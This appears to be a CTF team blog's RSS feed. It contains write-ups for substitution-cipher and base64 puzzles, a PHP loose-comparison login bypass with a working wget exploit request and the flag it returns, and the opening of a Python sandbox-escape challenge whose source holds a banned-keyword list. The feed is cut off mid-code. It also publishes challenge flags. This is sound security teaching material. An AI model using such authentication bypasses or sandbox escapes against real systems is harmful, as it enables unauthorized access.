vimvaders http://vimvaders.github.io/ Wed, 06 Mar 2024 12:28:02 +0000 Wed, 06 Mar 2024 12:28:02 +0000 Jekyll v3.9.5 A present for all the Star Wars fans <p><img src="http://vimvaders.github.io/assets/nonsense/vimvaders-starwars.png" title="vim-vaders" alt="vim-vaders" /></p> Tue, 22 Dec 2015 12:00:00 +0000 http://vimvaders.github.io/nonsense/2015/12/22/star-wars.html http://vimvaders.github.io/nonsense/2015/12/22/star-wars.html starwars nonsense Seccon 2015: Last Challenge <blockquote> <p>Category: <em>Misc</em> - Points: <em>50</em></p> <p>Description:<br /> ex1<br /> Cipher:PXFR}QIVTMSZCNDKUWAGJB{LHYEO<br /> Plain: ABCDEFGHIJKLMNOPQRSTUVWXYZ{}<br /></p> <p>ex2<br /> Cipher:EV}ZZD{DWZRA}FFDNFGQO<br /> Plain: {HELLOWORLDSECCONCTF}<br /></p> <p>quiz<br /> Cipher:A}FFDNEA}}HDJN}LGH}PWO<br /> Plain: ??????????????????????<br /></p> </blockquote> <p>The last challenge in Seccon 2015 was exactly the same as the <a href="http://vimvaders.github.io/seccon2015/2015/12/09/start.html">first one</a>. It is still a <a href="https://en.wikipedia.org/wiki/Substitution_cipher"><em>substitution cipher</em></a> and we have to decode the last message. The substitution pattern is different from the other challenge but we can use the same approach.</p> <p>We wrote the following python <a href="http://vimvaders.github.io/assets/seccon2015/last.py">script</a>, using <a href="https://docs.python.org/2/library/string.html#string.maketrans"><code class="language-plaintext highlighter-rouge">maketrans</code></a> and <a href="https://docs.python.org/2/library/string.html#string.translate"><code class="language-plaintext highlighter-rouge">translate</code></a>.</p> <figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="c1">#!/usr/bin/env python </span> <span class="kn">from</span> <span class="nn">string</span> <span class="kn">import</span> <span class="n">translate</span><span class="p">,</span> <span class="n">maketrans</span> <span class="n">table</span> <span class="o">=</span> <span class="n">maketrans</span><span class="p">(</span><span class="s">'PXFR}QIVTMSZCNDKUWAGJB{LHYEO'</span><span class="p">,</span> <span class="s">'ABCDEFGHIJKLMNOPQRSTUVWXYZ{}'</span><span class="p">)</span> <span class="n">cipher</span> <span class="o">=</span> <span class="s">'A}FFDNEA}}HDJN}LGH}PWO'</span> <span class="k">print</span> <span class="n">translate</span><span class="p">(</span><span class="n">cipher</span><span class="p">,</span> <span class="n">table</span><span class="p">)</span></code></pre></figure> <p>We then execute the script:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ ./last.py SECCON{SEEYOUNEXTYEAR} </code></pre></div></div> <p>So the flag is: <code class="language-plaintext highlighter-rouge">SECCON{SEEYOUNEXTYEAR}</code></p> <p><img src="http://imgs.xkcd.com/comics/security.png" alt="xkcd" /></p> Wed, 09 Dec 2015 20:00:00 +0000 http://vimvaders.github.io/seccon2015/2015/12/09/last-challenge.html http://vimvaders.github.io/seccon2015/2015/12/09/last-challenge.html ctf misc seccon2015 Seccon 2015: Start <blockquote> <p>Category: <em>Misc</em> - Points: <em>50</em></p> <p>Description:<br /></p> <p>ex1<br /> Cipher:PXFR}QIVTMSZCNDKUWAGJB{LHYEO<br /> Plain: ABCDEFGHIJKLMNOPQRSTUVWXYZ{}<br /></p> <p>ex2<br /> Cipher:EV}ZZD{DWZRA}FFDNFGQO<br /> Plain: {HELLOWORLDSECCONCTF}<br /></p> <p>quiz<br /> Cipher:A}FFDNEVPFSGV}KZPN}GO<br /> Plain: ?????????????????????<br /></p> </blockquote> <p>This is the first challenge and it is just a <em>sanity check</em>. From the description it is clear that we are given a <a href="https://en.wikipedia.org/wiki/Substitution_cipher"><em>substitution cipher</em></a> and we have to decode the last message.</p> <p><img src="http://vimvaders.github.io/assets/seccon2015/cipher_jefferson.jpg" alt="Substitution Cipher" /></p> <p>We wrote the following python <a href="http://vimvaders.github.io/assets/seccon2015/start.py">script</a>, using <a href="https://docs.python.org/2/library/string.html#string.maketrans"><code class="language-plaintext highlighter-rouge">maketrans</code></a> and <a href="https://docs.python.org/2/library/string.html#string.translate"><code class="language-plaintext highlighter-rouge">translate</code></a>.</p> <figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="c1">#!/usr/bin/env python </span> <span class="kn">from</span> <span class="nn">string</span> <span class="kn">import</span> <span class="n">maketrans</span><span class="p">,</span> <span class="n">translate</span> <span class="n">table</span> <span class="o">=</span> <span class="n">maketrans</span><span class="p">(</span><span class="s">'PXFR}QIVTMSZCNDKUWAGJB{LHYEO'</span><span class="p">,</span> <span class="s">'ABCDEFGHIJKLMNOPQRSTUVWXYZ{}'</span><span class="p">)</span> <span class="n">cipher</span> <span class="o">=</span> <span class="s">'A}FFDNEVPFSGV}KZPN}GO'</span> <span class="k">print</span> <span class="n">translate</span><span class="p">(</span><span class="n">cipher</span><span class="p">,</span> <span class="n">table</span><span class="p">)</span></code></pre></figure> <p>We then execute the script:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ ./solve.py SECCON{HACKTHEPLANET} </code></pre></div></div> <p>So the flag is: <code class="language-plaintext highlighter-rouge">SECCON{HACKTHEPLANET}</code></p> Wed, 09 Dec 2015 10:00:00 +0000 http://vimvaders.github.io/seccon2015/2015/12/09/start.html http://vimvaders.github.io/seccon2015/2015/12/09/start.html ctf misc seccon2015 TumCTF 2015: Sanity Check <blockquote> <p>Category: <em>Misc</em> - Points: <em>1</em></p> <p>Description: Are you alive?</p> <p>Vm0wd2QyUXlWa2hWV0doVVYwZG9jRlZ0TVZOWFZsbDNXa1JTVjFac2JETlhhMUpUVmpGYWMySkVUbGhoTVVwVVZtcEJlRll5U2tWVQpiR2hvVFZWd1ZWWnFRbUZUTWsxNVUydFdWUXBpU0VKWVZtMTRkMVZXV25GVGFsSmFWakF4TkZaSE5VOVhRWEJwVWpGS1ZWWkdVa2RUCk1WWlhXa1prWVZKR1NsVlVWM040VGtaa2NtRkdaR2hSV0VKVVdXdG9RMWRXWkZobFIzUnBDazFFUm5wV01qVkxXVlpPU1ZGdVRsWmkKVkVaVVZURmFZV1JIVWtsVWJXaGhUVEJLVlZkWGVHdGlNbEp6VjJ0a1dHSlViRk5EYXpGelYyeG9WMDFYYUhaV01HUkxWMVpXYzFacwpWbGNLWWtoQ05sWkhkR0ZaVms1R1RsWmFhMUp0YUZOV01GWkxaREZhV0UxRVJsSk5WMUpZVjJ0b1QxbFdTa1pUYlVaRVlrWnNNMWxyClVsTlhSMFY0WTBoS1YySlVSa2RhVmxwWFl6RmFjd3BqUjJ0TFZXMDFRMkl4V25GUmJVWnFZbFpHTkZZeU5VOVpWa3AwWVVaT1YwMUcKV2t4YVJFWmhWMGRPUm1SSGJFNVdia0paVm1wS05HSXlTa2RUYWxwcFVtczFSVmxzVm5kWFJsbDVDazVZWkZkTlJFWXhWbGMxUzFZdwpNVWhWYTNoWFRWWndXRmw2Um1GamQzQlhZa2RPVEZaR1VrdGlNVkpYVjJ4V1VtSlZXbkZaYkZwSFRrWlplVTVXWkZkV01IQkpWbGQ0CmExWXdNVWNLVjJ0NFlWSXphSEpaZWtaM1VsWldjMk5HWkdsU2JrSktWbXBLTUdJeFVYaGlSbVJVWVRGd1ZWbHJXbUZTVm14WlkwVmsKV0ZKc1ZqVkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZzWkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBWVmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpOUkd4RVdub3dPVU5uUFQwSwo=</p> </blockquote> <p>This was the first challenge of the new TumCTF organized by h4x0rpsch0rr. Even if this was the first time for this group to organize a CTF, the challenges were very interesting.</p> <p>This was just a sanity check. It is pretty obvious that the text in the description is encoded in base64, so let’s decode it:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ echo "Vm0wd2QyVkhVWGhUV0docFVtMVNXVll3WkRSV1ZsbDNXa1JTVjFac2JETlhhMUpUVmpBeFYySkVU bGhoTVVwVVZqQmFTMk15U2tWVQpiSEJYVm14d1VWWnFTalJaVjAxNFZHNU9XQXBpUjFKVVZGUkdT MVZXWkZkYVJGSlVUV3N4TkZkcmFGZGhRWEJUWWtoQ1dWZFhlR3RpCk1ERnpWMjVLWVZOSVFuTlZi VEZUVTFaYWRHUklUbWhhTTBKVVdXeGtiMlJzV2tkWGJUbFNDazFzV2xoV01XaHZWMGRLV1ZWc1Zs VlcKYkhCNlZHdGFZVk5GTlZaa1JtaFNWMFZLZDFaWE1ERlJNV1JYV2toT1lWSkZTbUZEYkZsM1lr UlNXR0V4Y0hKV2JURkdaVlpXYzFacwpjR2tLVW01Q2IxWnFRbUZqYlZGNFYyNU9ZVkp0YUZOV01G WkxaREZhV0dORmRHbE5WbkJZVmpKNGIySkdTalppUms1RVlsVndXRll5Ck5YZFdNREYxVlc1S1Yw MUhVa3hXTVZwWFl6RmFjd3BXYkdOTFZGUktiMVJXV2xWUmJVWnFZbFpHTkZZeU5WZFdWMHBJVld4 a1YwMUcKV2t4YVIzaHJZekZ3UlZWc2NGZGlSbkJKVmpKMGIxUXhiRmRUYTFwVVlrWmFSVmxZY0Vk WFJsVjVDbVZIT1ZkaVZYQkpXVlZvZDFZdwpNWEZTYkdoaFVsZFNXRlZxUms5amQzQmhVbTFPVEZk WGVGWmtNbEY0VjJ0V1UySkhVbFpVVjNSM1pXeFdXR1ZHWkZWaVJYQmFWa2QwCk5GSkdjRFlLVFVS c1JGcDZNRGxEWnowOUNnPT0K" | base64 -D Vm0wd2VHUXhTWGhpUm1SWVYwZDRWVll3WkRSV1ZsbDNXa1JTVjAxV2JETlhhMUpUVjBaS2MySkVU bHBXVmxwUVZqSjRZV014VG5OWApiR1JUVFRGS1VWZFdaRFJUTWsxNFdraFdhQXBTYkhCWVdXeGti MDFzV25KYVNIQnNVbTFTU1ZadGRITmhaM0JUWWxkb2RsWkdXbTlSCk1sWlhWMWhvV0dKWVVsVlVW bHB6VGtaYVNFNVZkRmhSV0VKd1ZXMDFRMWRXWkhOYVJFSmFDbFl3YkRSWGExcHJWbTFGZVZWc1Zs cGkKUm5Cb1ZqQmFjbVF4V25OYVJtaFNWMFZLZDFaWGNFdGlNVnBYVjJ4b2JGSjZiRk5EYlVwWFYy NXdWMDF1VW5KV01HUkxWMVpXYzFacwpWbGNLVFRKb1RWWlVRbUZqYlZGNFYyNVdWV0pIVWxkV01G WkxaR3hrYzFwRVVscFdiRnBJVjJ0b1QxbFdTa1pUYkZaRVlYcEdXRlV5CmVHOVdiVXBJWVVod1Yw MXFSbGhhUldSWFVqRk9jd3BhUm1OTFdXeFZkMlF4V2tWU2JHUlZUV3R3ZWxWWGVGZFViRXBaVkd0 NFJGcDYKTURsRFp6MDlDZz09Cg== </code></pre></div></div> <p>Ok, this seems to be the classical challenge were multiple base64 steps were performed on some text (probably the flag). Let’s use the always-good simple <a href="http://vimvaders.github.io/assets/tumctf2015/multi64.py">python script</a> for these occasions:</p> <figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s">'data'</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span> <span class="n">data</span> <span class="o">=</span> <span class="n">f</span><span class="p">.</span><span class="n">read</span><span class="p">()</span> <span class="k">while</span> <span class="bp">True</span><span class="p">:</span> <span class="k">try</span><span class="p">:</span> <span class="n">data</span> <span class="o">=</span> <span class="n">data</span><span class="p">.</span><span class="n">decode</span><span class="p">(</span><span class="s">'base64'</span><span class="p">)</span> <span class="k">print</span> <span class="n">data</span> <span class="k">except</span><span class="p">:</span> <span class="k">break</span></code></pre></figure> <p>When we run it the result is:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ python sanity.py Vm0wd2QyVkhVWGhUV0docFVtMVNXVll3WkRSV1ZsbDNXa1JTVjFac2JETlhhMUpUVmpBeFYySkVU bGhoTVVwVVZqQmFTMk15U2tWVQpiSEJYVm14d1VWWnFTalJaVjAxNFZHNU9XQXBpUjFKVVZGUkdT MVZXWkZkYVJGSlVUV3N4TkZkcmFGZGhRWEJUWWtoQ1dWZFhlR3RpCk1ERnpWMjVLWVZOSVFuTlZi VEZUVTFaYWRHUklUbWhhTTBKVVdXeGtiMlJzV2tkWGJUbFNDazFzV2xoV01XaHZWMGRLV1ZWc1Zs VlcKYkhCNlZHdGFZVk5GTlZaa1JtaFNWMFZLZDFaWE1ERlJNV1JYV2toT1lWSkZTbUZEYkZsM1lr UlNXR0V4Y0hKV2JURkdaVlpXYzFacwpjR2tLVW01Q2IxWnFRbUZqYlZGNFYyNU9ZVkp0YUZOV01G WkxaREZhV0dORmRHbE5WbkJZVmpKNGIySkdTalppUms1RVlsVndXRll5Ck5YZFdNREYxVlc1S1Yw MUhVa3hXTVZwWFl6RmFjd3BXYkdOTFZGUktiMVJXV2xWUmJVWnFZbFpHTkZZeU5WZFdWMHBJVld4 a1YwMUcKV2t4YVIzaHJZekZ3UlZWc2NGZGlSbkJKVmpKMGIxUXhiRmRUYTFwVVlrWmFSVmxZY0Vk WFJsVjVDbVZIT1ZkaVZYQkpXVlZvZDFZdwpNWEZTYkdoaFVsZFNXRlZxUms5amQzQmhVbTFPVEZk WGVGWmtNbEY0VjJ0V1UySkhVbFpVVjNSM1pXeFdXR1ZHWkZWaVJYQmFWa2QwCk5GSkdjRFlLVFVS c1JGcDZNRGxEWnowOUNnPT0K Vm0wd2VHUXhTWGhpUm1SWVYwZDRWVll3WkRSV1ZsbDNXa1JTVjAxV2JETlhhMUpUVjBaS2MySkVU bHBXVmxwUVZqSjRZV014VG5OWApiR1JUVFRGS1VWZFdaRFJUTWsxNFdraFdhQXBTYkhCWVdXeGti MDFzV25KYVNIQnNVbTFTU1ZadGRITmhaM0JUWWxkb2RsWkdXbTlSCk1sWlhWMWhvV0dKWVVsVlVW bHB6VGtaYVNFNVZkRmhSV0VKd1ZXMDFRMWRXWkhOYVJFSmFDbFl3YkRSWGExcHJWbTFGZVZWc1Zs cGkKUm5Cb1ZqQmFjbVF4V25OYVJtaFNWMFZLZDFaWGNFdGlNVnBYVjJ4b2JGSjZiRk5EYlVwWFYy NXdWMDF1VW5KV01HUkxWMVpXYzFacwpWbGNLVFRKb1RWWlVRbUZqYlZGNFYyNVdWV0pIVWxkV01G WkxaR3hrYzFwRVVscFdiRnBJVjJ0b1QxbFdTa1pUYkZaRVlYcEdXRlV5CmVHOVdiVXBJWVVod1Yw MXFSbGhhUldSWFVqRk9jd3BhUm1OTFdXeFZkMlF4V2tWU2JHUlZUV3R3ZWxWWGVGZFViRXBaVkd0 NFJGcDYKTURsRFp6MDlDZz09Cg== Vm0weGQxSXhiRmRYV0d4VVYwZDRWVll3WkRSV01WbDNXa1JTV0ZKc2JETlpWVlpQVjJ4YWMxTnNX bGRTTTFKUVdWZDRTMk14WkhWaApSbHBYWWxkb01sWnJaSHBsUm1SSVZtdHNhZ3BTYldodlZGWm9R MlZXV1hoWGJYUlVUVlpzTkZaSE5VdFhRWEJwVW01Q1dWZHNaREJaClYwbDRXa1prVm1FeVVsVlpi RnBoVjBacmQxWnNaRmhSV0VKd1ZXcEtiMVpXV2xobFJ6bFNDbUpXV25wV01uUnJWMGRLV1ZWc1Zs VlcKTTJoTVZUQmFjbVF4V25WVWJHUldWMFZLZGxkc1pEUlpWbFpIV2toT1lWSkZTbFZEYXpGWFUy eG9WbUpIYUhwV01qRlhaRWRXUjFOcwpaRmNLWWxVd2QxWkVSbGRVTWtwelVXeFdUbEpZVGt4RFp6 MDlDZz09Cg== Vm0xd1IxbFdXWGxUV0d4VVYwZDRWMVl3WkRSWFJsbDNZVVZPV2xac1NsWldSM1JQWVd4S2MxZHVh RlpXYldoMlZrZHplRmRIVmtsagpSbWhvVFZoQ2VWWXhXbXRUTVZsNFZHNUtXQXBpUm5CWVdsZDBZ V0l4WkZkVmEyUlVZbFphV0Zrd1ZsZFhRWEJwVWpKb1ZWWlhlRzlSCmJWWnpWMnRrV0dKWVVsVlVW M2hMVTBacmQxWnVUbGRWV0VKdldsZDRZVlZHWkhOYVJFSlVDazFXU2xoVmJHaHpWMjFXZEdWR1Ns ZFcKYlUwd1ZERldUMkpzUWxWTlJYTkxDZz09Cg== Vm1wR1lWWXlTWGxUV0d4V1YwZDRXRll3YUVOWlZsSlZWR3RPYWxKc1duaFZWbWh2VkdzeFdHVklj RmhoTVhCeVYxWmtTMVl4VG5KWApiRnBYWld0YWIxZFdVa2RUYlZaWFkwVldXQXBpUjJoVVZXeG9R bVZzV2tkWGJYUlVUV3hLU0Zrd1ZuTldVWEJvWld4YVVGZHNaREJUCk1WSlhVbGhzV21WdGVGSldW bU0wVDFWT2JsQlVNRXNLCg== VmpGYVYySXlTWGxWV0d4WFYwaENZVlJVVGtOalJsWnhVVmhvVGsxWGVIcFhhMXByV1ZkS1YxTnJX bFpXZWtab1dWUkdTbVZXY0VWWApiR2hUVWxoQmVsWkdXbXRUTWxKSFkwVnNWUXBoZWxaUFdsZDBT MVJXUlhsWmVteFJWVmM0T1VOblBUMEsK VjFaV2IySXlVWGxXV0hCYVRUTkNjRlZxUVhoTk1XeHpXa1prWVdKV1NrWlZWekZoWVRGSmVWcEVX bGhTUlhBelZGWmtTMlJHY0VsVQphelZPWld0S1RWRXlZemxRVVc4OUNnPT0K V1ZWb2IyUXlWWHBaTTNCcFVqQXhNMWxzWkZkYWJWSkZVVzFhYTFJeVpEWlhSRXAzVFZkS2RGcElU azVOZWtKTVEyYzlQUW89Cg== WVVob2QyVXpZM3BpUjAxM1lsZFdabVJFUW1aa1IyZDZXREp3TVdKdFpITk5NekJMQ2c9PQo= YUhod2UzY3piR013YldWZmREQmZkR2d6WDJwMWJtZHNNMzBLCg== aHhwe3czbGMwbWVfdDBfdGgzX2p1bmdsM30K hxp{w3lc0me_t0_th3_jungl3} </code></pre></div></div> <p>So the flag is: <strong>hxp{w3lc0me_t0_th3_jungl3}</strong></p> Mon, 26 Oct 2015 12:00:00 +0000 http://vimvaders.github.io/tumctf2015/2015/10/26/sanity-check.html http://vimvaders.github.io/tumctf2015/2015/10/26/sanity-check.html ctf misc tumctf2015 Layer7 2015: Login <blockquote> <p>Category: <em>web</em> - Points: <em>50</em></p> <p>Description: <em>http://prob.layer7.kr/login/index.php</em></p> </blockquote> <p>The address in the description points to a login form. The page also provides us the PHP code behind the login form:</p> <figure class="highlight"><pre><code class="language-php" data-lang="php"><span class="cp">&lt;?php</span> <span class="nb">define</span><span class="p">(</span><span class="s2">"FNAME"</span><span class="p">,</span> <span class="nb">basename</span><span class="p">(</span><span class="k">__FILE__</span><span class="p">));</span> <span class="nb">define</span><span class="p">(</span><span class="s2">"PATH"</span><span class="p">,</span> <span class="nb">dirname</span><span class="p">(</span><span class="k">__FILE__</span><span class="p">)</span> <span class="mf">.</span> <span class="s2">"/"</span><span class="p">);</span> <span class="k">include_once</span><span class="p">(</span><span class="nb">dirname</span><span class="p">(</span><span class="k">__FILE__</span><span class="p">)</span> <span class="mf">.</span> <span class="s2">"/config.php"</span><span class="p">);</span> <span class="k">function</span> <span class="n">filter</span><span class="p">(</span><span class="nv">$username</span><span class="p">){</span> <span class="k">if</span><span class="p">(</span><span class="nb">preg_match</span><span class="p">(</span><span class="s2">"/[A-Z][a-z][0-9].*/"</span><span class="p">,</span> <span class="nv">$username</span><span class="p">)){</span> <span class="nv">$auth</span> <span class="o">=</span> <span class="kc">true</span><span class="p">;</span> <span class="p">}</span><span class="k">else</span><span class="p">{</span> <span class="nv">$auth</span> <span class="o">=</span> <span class="kc">false</span><span class="p">;</span> <span class="p">}</span> <span class="k">return</span> <span class="nv">$auth</span><span class="p">;</span> <span class="p">}</span> <span class="k">function</span> <span class="n">challenge</span><span class="p">(</span><span class="nv">$username</span><span class="p">,</span> <span class="nv">$password</span><span class="p">){</span> <span class="k">global</span> <span class="nv">$flag</span><span class="p">;</span> <span class="k">if</span><span class="p">(</span><span class="k">isset</span><span class="p">(</span><span class="nv">$username</span><span class="p">)){</span> <span class="k">if</span><span class="p">(</span><span class="k">isset</span><span class="p">(</span><span class="nv">$password</span><span class="p">)){</span> <span class="k">if</span><span class="p">(</span><span class="o">!</span><span class="nf">filter</span><span class="p">(</span><span class="nv">$username</span><span class="p">))</span> <span class="k">return</span> <span class="s2">"Filter it"</span><span class="p">;</span> <span class="nv">$rand_val</span> <span class="o">=</span> <span class="s2">"abcdefghijklmnopqrstuvwxyz0123456789"</span><span class="p">;</span> <span class="nv">$passwd</span> <span class="o">=</span> <span class="s1">''</span><span class="p">;</span> <span class="k">for</span><span class="p">(</span><span class="nv">$j</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="nv">$j</span> <span class="o">&lt;</span> <span class="mi">2</span><span class="p">;</span> <span class="nv">$j</span><span class="o">++</span><span class="p">){</span> <span class="k">for</span><span class="p">(</span><span class="nv">$i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="nv">$i</span> <span class="o">&lt;</span> <span class="mi">31337</span><span class="p">;</span> <span class="nv">$i</span><span class="o">++</span><span class="p">){</span> <span class="nv">$passwd</span><span class="p">[</span><span class="nv">$j</span><span class="p">]</span> <span class="mf">.</span><span class="o">=</span> <span class="nv">$rand_val</span><span class="p">[</span><span class="nb">rand</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="nb">strlen</span><span class="p">(</span><span class="nv">$rand_val</span><span class="p">)</span> <span class="o">-</span> <span class="mi">1</span><span class="p">)];</span> <span class="p">}</span> <span class="p">}</span> <span class="nv">$database</span> <span class="o">=</span> <span class="k">array</span><span class="p">(</span> <span class="s2">"Layer7"</span> <span class="o">=&gt;</span> <span class="nv">$passwd</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="s2">"Admin0"</span> <span class="o">=&gt;</span> <span class="nv">$passwd</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="p">);</span> <span class="k">if</span><span class="p">(</span><span class="nv">$database</span><span class="p">[</span><span class="nv">$username</span><span class="p">]</span> <span class="o">!=</span> <span class="nv">$password</span><span class="p">){</span> <span class="k">return</span> <span class="nv">$passwd</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span> <span class="p">}</span> <span class="k">return</span> <span class="nb">sprintf</span><span class="p">(</span><span class="s2">"flag is %s"</span><span class="p">,</span> <span class="nv">$flag</span><span class="p">);</span> <span class="p">}</span><span class="k">else</span><span class="p">{</span> <span class="k">return</span> <span class="s2">"Input Password"</span><span class="p">;</span> <span class="p">}</span> <span class="p">}</span><span class="k">else</span><span class="p">{</span> <span class="nb">highlight_file</span><span class="p">(</span><span class="no">PATH</span> <span class="mf">.</span> <span class="s1">'index.php'</span><span class="p">);</span> <span class="k">return</span> <span class="s2">"Input Username"</span><span class="p">;</span> <span class="p">}</span> <span class="p">}</span> <span class="k">echo</span> <span class="s1">'&lt;form method=post&gt;&lt;input type=text name=username&gt;&lt;input type=password name=password&gt;&lt;input type=submit value=Login&gt;&lt;/form&gt;'</span><span class="p">;</span> <span class="nb">printf</span><span class="p">(</span><span class="s2">"&lt;br&gt;Message : %s!"</span><span class="p">,</span> <span class="nf">challenge</span><span class="p">(</span><span class="nv">$_POST</span><span class="p">[</span><span class="s1">'username'</span><span class="p">],</span> <span class="nv">$_POST</span><span class="p">[</span><span class="s1">'password'</span><span class="p">]));</span> <span class="cp">?&gt;</span></code></pre></figure> <h2 id="analysis">Analysis</h2> <p>Each time the php is run a new array <code class="language-plaintext highlighter-rouge">$database</code> is created storing the passwords of the two users: <code class="language-plaintext highlighter-rouge">Layer7</code> and <code class="language-plaintext highlighter-rouge">Admin0</code>. However, the password are composed by 31337 random characters, which makes the login page impossible to bruteforce or guess. If the password does not match, the password for the user <code class="language-plaintext highlighter-rouge">Layer7</code> is printed, but since it will be regenerated the next time, this information is useless.</p> <p>Next we noted that the username is validated using the <code class="language-plaintext highlighter-rouge">filter</code> function, allowing only usernames which satisfy the following regex:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[A-Z][a-z][0-9].* </code></pre></div></div> <p>Since <code class="language-plaintext highlighter-rouge">Layer7</code> and <code class="language-plaintext highlighter-rouge">Admin0</code> do not satisfy the regular expression, they are not even usable in the login form, so we have to look for something else.</p> <p>When the <code class="language-plaintext highlighter-rouge">$username</code> is not in the <code class="language-plaintext highlighter-rouge">$database</code> array, <code class="language-plaintext highlighter-rouge">$database[$username]</code> returns a <code class="language-plaintext highlighter-rouge">NULL</code> value. Moreover, this value is compared to the <code class="language-plaintext highlighter-rouge">$password</code> using the PHP <em>loose comparison</em> (PHP uses <a href="http://php.net/manual/en/types.comparisons.php#types.comparisions-loose"><em>loose comparison</em></a> with <code class="language-plaintext highlighter-rouge">==</code> and <code class="language-plaintext highlighter-rouge">!=</code>, while it uses <a href="http://php.net/manual/en/types.comparisons.php#types.comparisions-strict"><em>strict comparison</em></a> with <code class="language-plaintext highlighter-rouge">===</code> and <code class="language-plaintext highlighter-rouge">!==</code>).</p> <p>The PHP loose comparison operator has a really strange behavior. This is its truth table:</p> <p><img src="http://vimvaders.github.io/assets/layer7-2015/loose.png" alt="php loose comparison" /></p> <p>The highlighted row is used when one of the two operands is <code class="language-plaintext highlighter-rouge">NULL</code>. Since we want the result to be <em>true</em>, we need the password to be either <code class="language-plaintext highlighter-rouge">FALSE</code>, <code class="language-plaintext highlighter-rouge">0</code>, <code class="language-plaintext highlighter-rouge">NULL</code>, <code class="language-plaintext highlighter-rouge">ARRAY</code> or <code class="language-plaintext highlighter-rouge">""</code>. So we can just provide an empty password and the comparison should be verified, giving the flag in return.</p> <h3 id="exploit">Exploit</h3> <p>We have to provide an username which verifies the <code class="language-plaintext highlighter-rouge">filter</code> function (such as <code class="language-plaintext highlighter-rouge">Aa0</code>) and an empty password, which is different from not providing the <code class="language-plaintext highlighter-rouge">password</code> field at all (otherwise the <code class="language-plaintext highlighter-rouge">isset</code> would return false and the message <code class="language-plaintext highlighter-rouge">Input Password</code> would be displayed). We can use different tools to POST the needed data to the webpage. The easiest way is to use <code class="language-plaintext highlighter-rouge">wget</code>:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>wget -qO- http://prob.layer7.kr/login/index.php --post-data='username=Aa0&amp;password=' </code></pre></div></div> <p>This gives the following output:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>&lt;form method=post&gt;&lt;input type=text name=username&gt;&lt;input type=password name=password&gt;&lt;input type=submit value=Login&gt;&lt;/form&gt;&lt;br&gt;Message : flag is a52a12ec82efd713433b16aea3f32cae! </code></pre></div></div> <p>So the flag is: <code class="language-plaintext highlighter-rouge">a52a12ec82efd713433b16aea3f32cae</code></p> <h3 id="how-to-improve-the-code">How to improve the code?</h3> <p>The problem here is that <em>loose comparison</em> tries to compare different types. The code could be improved using <em>strict comparison</em>, which has the following truth table:</p> <p><img src="http://vimvaders.github.io/assets/layer7-2015/strict.png" alt="php strict comparison" /></p> <p>Since we have no way to pass a <code class="language-plaintext highlighter-rouge">NULL</code> parameter through a form, that would have prevented the exploit.</p> Sun, 30 Aug 2015 00:00:00 +0000 http://vimvaders.github.io/layer7-2015/2015/08/30/login.html http://vimvaders.github.io/layer7-2015/2015/08/30/login.html ctf web layer7-2015 IceCTF 2015: PyShell <p><img src="http://vimvaders.github.io/assets/icectf2015/icectf.png" alt="icectf" /></p> <blockquote> <p>Category: <em>exploitation</em> - Points: <em>100</em></p> <p>Description: <em>Daniel is running this server which allows you to evaluate basic python expressions. It’s clear that he’s tried to secure it though. Can you see if you can get it to print the flag? You can access it by running</em> <code class="language-plaintext highlighter-rouge">nc vuln2015.icec.tf 8000</code> <em>.</em></p> <p>Hint: <em>Even if some keywords are banned, is that gonna stop you?</em></p> </blockquote> <p>The task comes with the file <a href="http://vimvaders.github.io/assets/icectf2015/shell.py"><code class="language-plaintext highlighter-rouge">shell.py</code></a> which is the source code of the webservice available at the specified location. The source is the following:</p> <figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="c1">#!/usr/bin/env python </span> <span class="kn">from</span> <span class="nn">__future__</span> <span class="kn">import</span> <span class="n">print_function</span> <span class="kn">import</span> <span class="nn">sys</span> <span class="k">print</span><span class="p">(</span><span class="s">"Welcome to my Python sandbox! Enter commands below! Please don't mess up my server though :/"</span><span class="p">)</span> <span class="n">sys</span><span class="p">.</span><span class="n">stdout</span><span class="p">.</span><span class="n">flush</span><span class="p">()</span> <span class="n">banned</span> <span class="o">=</span> <span class="p">[</span> <span class="s">"import"</span><span class="p">,</span> <span class="s">"exec"</span><span class="p">,</span> <span class="s">"eval"</span><span class="p">,</span> <span class="s">"pickle"</span><span class="p">,</span> <span class="s">"os"</span><span class="p">,</span> <span class="s">"subprocess"</span><span class="p">,</span> <span class="s">"input"</span><span class="p">,</span> <span class="s">"banned"</span><span class="p">,</span> <span class="s">"sys"</span> <span class="p">]</span> <span class="n">targets</span> <span class="o">=</span> <span class="n">__builtins__</span><span class="p">.</span><span class="n">__dict__</span><span class="p">.</span><span class="n">keys</span><span class="p">()</span> <span class="n">targets</span><span class="p">.</span><span class="n">remove</span><span class="p">(</span><span class="s">'raw_input'</span><span class="p">)</span> <span class="n">targets</span><span class="p">.</span><span class="n">remove</span><span class="p">(</span><span class="s">'print'</span><span class="p">)</span> <span class="k">for</span> <span class="n">x</span> <span class="ow">in</span> <span class="n">targets</span><span class="p">:</span> <span class="k">del</span> <span class="n">__builtins__</span><span class="p">.</span><span 